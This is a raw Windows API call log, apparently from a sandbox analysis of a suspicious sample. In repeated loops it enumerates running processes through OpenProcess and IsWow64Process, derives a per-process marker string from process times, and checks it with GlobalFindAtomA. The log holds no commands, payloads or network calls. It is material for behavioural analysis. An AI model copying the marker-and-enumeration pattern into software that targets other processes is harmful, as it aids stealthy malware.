	[0103.438] CloseHandle (hObject=0x690) returned 1
	[0103.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.438] CloseHandle (hObject=0x690) returned 1
	[0103.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.438] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.438] CloseHandle (hObject=0x690) returned 1
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.474] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.474] CloseHandle (hObject=0x690) returned 1
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.475] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.475] CloseHandle (hObject=0x690) returned 1
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.475] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.475] CloseHandle (hObject=0x690) returned 1
	[0103.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.475] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.476] CloseHandle (hObject=0x690) returned 1
	[0103.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.476] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.476] CloseHandle (hObject=0x690) returned 1
	[0103.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.476] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.476] CloseHandle (hObject=0x690) returned 1
	[0103.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.476] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.476] CloseHandle (hObject=0x690) returned 1
	[0103.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.476] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.476] CloseHandle (hObject=0x690) returned 1
	[0103.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.477] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.477] CloseHandle (hObject=0x690) returned 1
	[0103.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.477] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.477] CloseHandle (hObject=0x690) returned 1
	[0103.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.477] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.477] CloseHandle (hObject=0x690) returned 1
	[0103.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.477] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.477] CloseHandle (hObject=0x690) returned 1
	[0103.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.478] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.478] CloseHandle (hObject=0x690) returned 1
	[0103.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.478] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.478] CloseHandle (hObject=0x690) returned 1
	[0103.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.478] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.478] CloseHandle (hObject=0x690) returned 1
	[0103.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.479] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.479] CloseHandle (hObject=0x690) returned 1
	[0103.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.479] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.479] CloseHandle (hObject=0x690) returned 1
	[0103.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.479] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.479] CloseHandle (hObject=0x690) returned 1
	[0103.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.479] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.479] CloseHandle (hObject=0x690) returned 1
	[0103.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.480] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.480] CloseHandle (hObject=0x690) returned 1
	[0103.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.480] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.480] CloseHandle (hObject=0x690) returned 1
	[0103.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.480] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.480] CloseHandle (hObject=0x690) returned 1
	[0103.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.480] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.480] CloseHandle (hObject=0x690) returned 1
	[0103.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.481] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.481] CloseHandle (hObject=0x690) returned 1
	[0103.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.481] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.481] CloseHandle (hObject=0x690) returned 1
	[0103.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.481] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.481] CloseHandle (hObject=0x690) returned 1
	[0103.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.481] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.481] CloseHandle (hObject=0x690) returned 1
	[0103.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.482] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.482] CloseHandle (hObject=0x690) returned 1
	[0103.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.482] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.482] CloseHandle (hObject=0x690) returned 1
	[0103.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.482] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.482] CloseHandle (hObject=0x690) returned 1
	[0103.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.482] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.482] CloseHandle (hObject=0x690) returned 1
	[0103.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.483] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.483] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.483] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.483] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.483] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.483] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.484] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.484] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.484] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.484] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.484] CloseHandle (hObject=0x690) returned 1
	[0103.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.484] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.484] CloseHandle (hObject=0x690) returned 1
	[0103.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.484] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.484] CloseHandle (hObject=0x690) returned 1
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.519] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.519] CloseHandle (hObject=0x690) returned 1
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.520] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.520] CloseHandle (hObject=0x690) returned 1
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.520] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.520] CloseHandle (hObject=0x690) returned 1
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.520] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.520] CloseHandle (hObject=0x690) returned 1
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.520] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.520] CloseHandle (hObject=0x690) returned 1
	[0103.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.520] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.520] CloseHandle (hObject=0x690) returned 1
	[0103.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.521] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.521] CloseHandle (hObject=0x690) returned 1
	[0103.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.521] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.521] CloseHandle (hObject=0x690) returned 1
	[0103.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.521] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.521] CloseHandle (hObject=0x690) returned 1
	[0103.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.521] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.521] CloseHandle (hObject=0x690) returned 1
	[0103.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.522] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.522] CloseHandle (hObject=0x690) returned 1
	[0103.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.522] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.522] CloseHandle (hObject=0x690) returned 1
	[0103.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.522] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.522] CloseHandle (hObject=0x690) returned 1
	[0103.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.522] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.522] CloseHandle (hObject=0x690) returned 1
	[0103.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.523] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.523] CloseHandle (hObject=0x690) returned 1
	[0103.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.523] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.523] CloseHandle (hObject=0x690) returned 1
	[0103.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.523] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.523] CloseHandle (hObject=0x690) returned 1
	[0103.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.523] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.523] CloseHandle (hObject=0x690) returned 1
	[0103.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.523] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.523] CloseHandle (hObject=0x690) returned 1
	[0103.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.524] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.524] CloseHandle (hObject=0x690) returned 1
	[0103.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.524] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.524] CloseHandle (hObject=0x690) returned 1
	[0103.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.524] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.524] CloseHandle (hObject=0x690) returned 1
	[0103.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.524] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.525] CloseHandle (hObject=0x690) returned 1
	[0103.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.525] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.525] CloseHandle (hObject=0x690) returned 1
	[0103.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.525] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.525] CloseHandle (hObject=0x690) returned 1
	[0103.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.525] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.525] CloseHandle (hObject=0x690) returned 1
	[0103.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.525] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.525] CloseHandle (hObject=0x690) returned 1
	[0103.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.526] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.526] CloseHandle (hObject=0x690) returned 1
	[0103.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.526] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.526] CloseHandle (hObject=0x690) returned 1
	[0103.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.526] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.526] CloseHandle (hObject=0x690) returned 1
	[0103.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.526] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.526] CloseHandle (hObject=0x690) returned 1
	[0103.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.527] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.527] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.527] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.527] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.527] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.527] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.528] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.528] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.528] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.528] CloseHandle (hObject=0x690) returned 1
	[0103.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.528] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.528] CloseHandle (hObject=0x690) returned 1
	[0103.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.528] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.528] CloseHandle (hObject=0x690) returned 1
	[0103.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
